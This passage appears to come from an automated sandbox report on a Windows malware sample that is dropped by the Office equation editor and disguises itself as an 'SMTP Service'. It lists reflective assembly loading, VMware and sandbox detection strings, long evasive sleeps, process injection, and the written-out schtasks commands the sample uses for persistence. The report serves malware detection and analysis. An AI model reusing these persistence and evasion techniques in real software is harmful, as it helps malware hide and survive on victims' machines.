        Source: 4.2.ALP.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 4.0.ALP.exe.910000.0.unpack, Forms/mainForm.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 4.2.ALP.exe.910000.14.unpack, Forms/mainForm.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 10.2.ALP.exe.910000.1.unpack, Forms/mainForm.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 10.0.ALP.exe.910000.0.unpack, Forms/mainForm.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 11.0.smtpsvc.exe.be0000.0.unpack, Forms/mainForm.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_0043C0D0 push ds; ret
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_00434B50 push eax; retn 004Eh
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_004732B7 push cs; ret
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_0025C3E8 push esp; iretd
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_0025C640 pushfd ; iretd
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_0031C0D0 push ds; ret
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_00314B50 push eax; retn 0047h
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002EC0D0 push ds; ret
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002E4B50 push eax; retn 004Ch
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0025C0D0 push ds; ret
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00254B50 push eax; retn 0042h
        Source: ALP.exe.2.dr Static PE information: 0x8C4B6098 [Tue Aug 2 11:29:28 2044 UTC]
        Source: initial sample Static PE information: section name: .text entropy: 7.26903403564
        Source: 4.2.ALP.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 4.2.ALP.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\ALP.exe
        Source: C:\Users\user\AppData\Roaming\ALP.exe File created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe

        Boot Survival:

        Uses schtasks.exe or at.exe to add and modify task schedules
        Source: C:\Users\user\AppData\Roaming\ALP.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3811.tmp'

        Hooking and other Techniques for Hiding and Protection:

        Hides that the sample has been downloaded from the Internet (zone.identifier)
        Source: C:\Users\user\AppData\Roaming\ALP.exe File opened: C:\Users\user\AppData\Roaming\ALP.exe:Zone.Identifier read attributes | delete
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exe Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        Yara detected AntiVM3
        Source: Yara match File source: 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.477879710.000000000249D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 0000000A.00000002.510442930.00000000022BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 0000000B.00000002.512977056.00000000022DD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: ALP.exe PID: 1272, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: ALP.exe PID: 2608, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: smtpsvc.exe PID: 2668, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: smtpsvc.exe PID: 2796, type: MEMORYSTR
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: ALP.exe, 00000003.00000002.477879710.000000000249D000.00000004.00000001.sdmp, ALP.exe, 0000000A.00000002.510442930.00000000022BD000.00000004.00000001.sdmp, smtpsvc.exe, 0000000B.00000002.512977056.00000000022DD000.00000004.00000001.sdmp, smtpsvc.exe, 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
        Source: ALP.exe, 00000003.00000002.477879710.000000000249D000.00000004.00000001.sdmp, ALP.exe, 0000000A.00000002.510442930.00000000022BD000.00000004.00000001.sdmp, smtpsvc.exe, 0000000B.00000002.512977056.00000000022DD000.00000004.00000001.sdmp, smtpsvc.exe, 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2648 Thread sleep time: -120000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\ALP.exe TID: 2644 Thread sleep time: -35196s >= -30000s
        Source: C:\Users\user\AppData\Roaming\ALP.exe TID: 1440 Thread sleep time: -60000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\ALP.exe TID: 1832 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\ALP.exe TID: 3044 Thread sleep time: -60000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\ALP.exe TID: 2532 Thread sleep time: -9223372036854770s >= -30000s
        Source: C:\Windows\System32\taskeng.exe TID: 1704 Thread sleep time: -60000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\ALP.exe TID: 1532 Thread sleep time: -40853s >= -30000s
        Source: C:\Users\user\AppData\Roaming\ALP.exe TID: 2592 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2836 Thread sleep time: -33312s >= -30000s
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2028 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2908 Thread sleep time: -42952s >= -30000s
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2300 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\ALP.exe TID: 1220 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\ALP.exe TID: 2624 Thread sleep time: -60000s >= -30000s
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2648 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2524 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\ALP.exe Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\ALP.exe Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\ALP.exe Thread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\ALP.exe Thread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\ALP.exe Window / User API: threadDelayed 3705
        Source: C:\Users\user\AppData\Roaming\ALP.exe Window / User API: threadDelayed 5868
        Source: C:\Users\user\AppData\Roaming\ALP.exe Process information queried: ProcessInformation
        Source: C:\Users\user\AppData\Roaming\ALP.exe Thread delayed: delay time: 35196
        Source: C:\Users\user\AppData\Roaming\ALP.exe Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\ALP.exe Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\ALP.exe Thread delayed: delay time: 40853
        Source: C:\Users\user\AppData\Roaming\ALP.exe Thread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 33312
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 42952
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\ALP.exe Thread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477
        Source: ALP.exe, 00000004.00000003.483036417.000000000057D000.00000004.00000001.sdmp Binary or memory string: HVVmcicda.dll
        Source: smtpsvc.exe, 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmp Binary or memory string: vmware
        Source: ALP.exe, 00000004.00000003.483027853.00000000005A1000.00000004.00000001.sdmp Binary or memory string: @XVmcicda.dll+
        Source: smtpsvc.exe, 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: smtpsvc.exe, 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
        Source: smtpsvc.exe, 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmp Binary or memory string: VMWARE
        Source: smtpsvc.exe, 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: smtpsvc.exe, 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
        Source: smtpsvc.exe, 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
        Source: smtpsvc.exe, 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
        Source: C:\Users\user\AppData\Roaming\ALP.exe Process token adjusted: Debug
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process token adjusted: Debug
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\ALP.exe Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        Injects a PE file into a foreign processes
        Source: C:\Users\user\AppData\Roaming\ALP.exe Memory written: C:\Users\user\AppData\Roaming\ALP.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\AppData\Roaming\ALP.exe Memory written: C:\Users\user\AppData\Roaming\ALP.exe base: 400000 value starts with: 4D5A
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory written: C:\Program Files (x86)\SMTP Service\smtpsvc.exe base: 400000 value starts with: 4D5A
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory written: C:\Program Files (x86)\SMTP Service\smtpsvc.exe base: 400000 value starts with: 4D5A
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe
        Source: C:\Users\user\AppData\Roaming\ALP.exe Process created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe
        Source: C:\Users\user\AppData\Roaming\ALP.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3811.tmp'
        Source: C:\Users\user\AppData\Roaming\ALP.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp277F.tmp'
        Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe 0
        Source: C:\Windows\System32\taskeng.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
        Source: C:\Users\user\AppData\Roaming\ALP.exe Process created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: ALP.exe, 00000004.00000002.695614062.0000000005DDD000.00000004.00000001.sdmp Binary or memory string: #rProgram Manager
        Source: ALP.exe, 00000004.00000002.693961530.000000000297E000.00000004.00000001.sdmp Binary or memory string: Program Manager48
        Source: ALP.exe, 00000004.00000002.693961530.000000000297E000.00000004.00000001.sdmp Binary or memory string: Program Manager
        Source: ALP.exe, 00000004.00000002.691270418.0000000000CD0000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.690283366.0000000000870000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
        Source: ALP.exe, 00000004.00000002.692454120.0000000002714000.00000004.00000001.sdmp Binary or memory string: Program Manager +
        Source: ALP.exe, 00000004.00000002.691270418.0000000000CD0000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.690283366.0000000000870000.00000002.00020000.sdmp Binary or memory string: !Progman
